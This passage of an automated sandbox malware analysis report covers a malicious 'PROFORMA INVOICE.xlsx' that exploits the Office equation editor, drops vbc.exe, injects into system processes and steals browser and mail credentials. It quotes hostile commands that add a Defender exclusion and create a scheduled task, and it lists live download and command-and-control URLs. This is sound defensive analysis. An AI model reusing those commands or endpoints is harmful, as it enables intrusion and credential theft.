          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-598
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-540
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-581
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: explorer.exe, 0000000A.00000000.1021492466.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.997219911.00000000004A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware_S
          Source: explorer.exe, 0000000A.00000000.1021492466.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.1000435054.0000000006320000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000000A.00000000.1027349561.0000000008844000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.999909369.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 0000000A.00000000.1021939258.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000A.00000000.1021492466.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 0000000A.00000000.1033695108.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000D1660 FindFirstFileW,FindNextFileW,FindClose,11_2_000D1660
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03690487 mov edx, dword ptr fs:[00000030h]2_2_03690487
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008926F8 mov eax, dword ptr fs:[00000030h]9_2_008926F8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025D26F8 mov eax, dword ptr fs:[00000030h]11_2_025D26F8
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00408ED0 rdtsc 9_2_00408ED0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0040A140 LdrLoadDll,9_2_0040A140
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.employeebnsf.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.171 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 5.183.8.183 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dems-clicks.com
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exeJump to behavior
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 3B0000Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: 8B0000Jump to behavior
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exeJump to behavior
          Source: explorer.exe, 0000000A.00000000.1012652801.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1053337399.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029899123.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.1012652801.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.999837899.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029308104.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.1012652801.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1053337399.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1029899123.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scripting
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          11
          Disable or Modify Tools
          1
          OS Credential Dumping
          3
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium35
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules
          1
          Scheduled Task/Job
          612
          Process Injection
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory113
          System Information Discovery
          Remote Desktop Protocol1
          Man in the Browser
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts23
          Exploitation for Client Execution
          Logon Script (Windows)1
          Scheduled Task/Job
          1
          Scripting
          Security Account Manager221
          Security Software Discovery
          SMB/Windows Admin Shares1
          Data from Local System
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          Command and Scripting Interpreter
          Logon Script (Mac)Logon Script (Mac)4
          Obfuscated Files or Information
          NTDS2
          Process Discovery
          Distributed Component Object Model1
          Email Collection
          Scheduled Transfer113
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud Accounts1
          Scheduled Task/Job
          Network Logon ScriptNetwork Logon Script23
          Software Packing
          LSA Secrets31
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading
          Cached Domain Credentials1
          Remote System Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items111
          Masquerading
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)612
          Process Injection
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626593 Sample: PROFORMA INVOICE.xlsx Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 48 www.cariniclinicalconsulting.com 2->48 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Antivirus detection for URL or domain 2->68 70 14 other signatures 2->70 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 26 2->16         started        signatures3 process4 dnsIp5 50 198.12.89.166, 49173, 80 AS-COLOCROSSINGUS United States 11->50 42 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->42 dropped 44 C:\Users\Public\vbc.exe, PE32 11->44 dropped 88 Office equation editor establishes network connection 11->88 90 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->90 18 vbc.exe 3 11->18         started        46 C:\Users\user\...\~$PROFORMA INVOICE.xlsx, data 16->46 dropped file6 signatures7 process8 file9 38 C:\Users\user\AppData\...\dDqpEdJEtzi.exe, PE32 18->38 dropped 40 C:\Users\user\AppData\Local\...\tmp7282.tmp, XML 18->40 dropped 72 Machine Learning detection for dropped file 18->72 74 Uses schtasks.exe or at.exe to add and modify task schedules 18->74 76 Adds a directory exclusion to Windows Defender 18->76 78 2 other signatures 18->78 22 vbc.exe 18->22         started        25 powershell.exe 6 18->25         started        27 schtasks.exe 18->27         started        signatures10 process11 signatures12 80 Modifies the context of a thread in another process (thread injection) 22->80 82 Maps a DLL or memory area into another process 22->82 84 Sample uses process hollowing technique 22->84 86 Queues an APC in another process (thread injection) 22->86 29 explorer.exe 22->29 injected process13 dnsIp14 52 www.employeebnsf.com 185.53.179.171, 49174, 80 TEAMINTERNET-ASDE Germany 29->52 54 www.dems-clicks.com 5.183.8.183, 49175, 80 INTERXSCH Germany 29->54 92 System process connects to network (likely due to code injection or exploit) 29->92 33 mstsc.exe 9 29->33         started        signatures15 process16 signatures17 56 Tries to steal Mail credentials (via file / registry access) 33->56 58 Tries to harvest and steal browser information (history, passwords, etc) 33->58 60 Modifies the context of a thread in another process (thread injection) 33->60 62 3 other signatures 33->62 36 firefox.exe 33->36         started        process18

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          PROFORMA INVOICE.xlsx35%VirustotalBrowse
          PROFORMA INVOICE.xlsx24%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802
          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLinkDownload
          9.0.vbc.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.vbc.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          SourceDetectionScannerLabelLink
          www.employeebnsf.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://198.12.89.166/55/vbc.exehhC:0%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://www.dems-clicks.com/n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH100%Avira URL Cloudmalware
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://198.12.89.166/55/vbc.exej0%Avira URL Cloudsafe
          http://198.12.89.166/55/vbc.exe0%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://198.12.89.166/55/vbc.exen0%Avira URL Cloudsafe
          www.admincost.com/n6g4/0%Avira URL Cloudsafe
          http://www.employeebnsf.com/n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ==100%Avira URL Cloudmalware
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://198.12.89.166/55/vbc.exeg0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.employeebnsf.com
          185.53.179.171
          truetrueunknown
          www.dems-clicks.com
          5.183.8.183
          truetrue
            unknown
            www.cariniclinicalconsulting.com
            104.21.75.67
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://www.dems-clicks.com/n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAHtrue
              • Avira URL Cloud: malware
              unknown
              http://198.12.89.166/55/vbc.exetrue
              • Avira URL Cloud: safe
              unknown
              www.admincost.com/n6g4/true
              • Avira URL Cloud: safe
              low
              http://www.employeebnsf.com/n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ==true
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.windows.com/pctv.explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                high
                http://investor.msn.comexplorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                  high
                  http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                    high
                    http://wellformedweb.org/CommentAPI/explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://198.12.89.166/55/vbc.exehhC:EQNEDT32.EXE, 00000002.00000002.969988460.0000000000669000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.iis.fhg.de/audioPAexplorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.piriform.com/ccleanerqexplorer.exe, 0000000A.00000000.1003477696.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://www.mozilla.com0explorer.exe, 0000000A.00000000.1024716428.0000000007539000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1036517344.0000000007539000.00000004.00000010.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.piriform.com/ccleaner1SPS0explorer.exe, 0000000A.00000000.1009597733.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1026640673.0000000008617000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 0000000A.00000000.1057754396.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.hotmail.com/oeexplorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
